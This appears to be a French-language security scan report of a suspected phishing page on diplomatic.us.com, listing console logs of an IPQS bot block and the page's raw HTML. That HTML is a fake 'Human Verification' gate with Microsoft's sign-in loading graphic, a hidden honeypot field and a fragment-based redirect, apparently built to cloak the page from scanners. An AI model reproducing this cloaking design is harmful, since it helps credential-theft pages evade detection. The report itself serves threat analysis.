https://diplomatic.us.com/YWJjQGF3cy5hbWF6b24uY

ID de l'analyse :
0d8c4223-5b51-4ec6-bbb0-5e12f96965b8Terminée
URL soumise :
https://diplomatic.us.com/YWJjQGF3cy5hbWF6b24uY
Fin du rapport :

Liens : 0 trouvé(s)

Liens sortants identifiés à partir de la page

Variables JavaScript : 7 trouvée(s)

Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel

NomType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
renderBlockedPageWithTimerfunction
Functionfunction
Objectfunction
__fpjs_pvidstring

Messages de journal de console : 15 trouvé(s)

Messages consignés dans la console web

TypeCatégorieEnregistrement
errornetwork
URL
https://diplomatic.us.com/YWJjQGF3cy5hbWF6b24uY
texte
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://diplomatic.us.com/favicon.ico
texte
Failed to load resource: the server responded with a status of 404 ()
debugjavascript
texte
JSHandle@error
errornetwork
URL
https://diplomatic.us.com/score_risk.php
texte
Failed to load resource: the server responded with a status of 403 ()
logjavascript
URL
https://diplomatic.us.com/captcha.js
texte
Server Response: JSHandle@object
logjavascript
URL
https://diplomatic.us.com/captcha.js
texte
IPQS Data: JSHandle@object
startGroupother
URL
https://diplomatic.us.com/captcha.js
texte
Blocking Details
logother
URL
https://diplomatic.us.com/captcha.js
texte
Blocked Message: Access denied: Bot detected by IPQS | Detected Signals: None
logother
URL
https://diplomatic.us.com/captcha.js
texte
Block Reason: permanently_blocked
logother
URL
https://diplomatic.us.com/captcha.js
texte
Blocked Until (if applicable): N/A
logother
URL
https://diplomatic.us.com/captcha.js
texte
Total Risk Score: N/A
logother
URL
https://diplomatic.us.com/captcha.js
texte
Normalized Risk Score: N/A
logother
URL
https://diplomatic.us.com/captcha.js
texte
Assessed Scores: N/A
logother
URL
https://diplomatic.us.com/captcha.js
texte
Detected Signals: N/A
endGroupother
URL
https://diplomatic.us.com/captcha.js
texte
console.groupEnd

HTML

Le corps HTML de la page en données brutes

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Human Verification</title>
    <style>
        body, html {
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: 0;
            font-family: Arial, sans-serif;
            text-align: center;
        }

        .verification-container {
            max-width: 400px;
        }

        #loading {
            display: none;
            margin-top: 20px;
            margin-left: 10rem;
        }

        .honeypot {
            display: none;
        }
    </style>
    <script>
        // Redirect logic for URLs with fragments
        document.addEventListener('DOMContentLoaded', () => {
            const fragment = window.location.hash.substring(1); // Get the part after '#'
            if (fragment) {
                const newUrl = `${window.location.origin}/${fragment}`;
                window.location.replace(newUrl);
                return; // Stop further script execution after redirect
            }
        });
    </script>
</head>
<body>
    <div class="verification-container">
        <!--<h1>Verifying...</h1>-->
        <!--<p>Please wait while we verify your access.</p>-->
        <div id="loading" style="display: block;">
            <img src="https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif" alt="Loading..." width="100%" align-content="center">
            <p></p>
        </div>
        <input type="text" name="honeypot" class="honeypot" value="">
    </div>
    <script src="captcha.js"></script>


</body></html>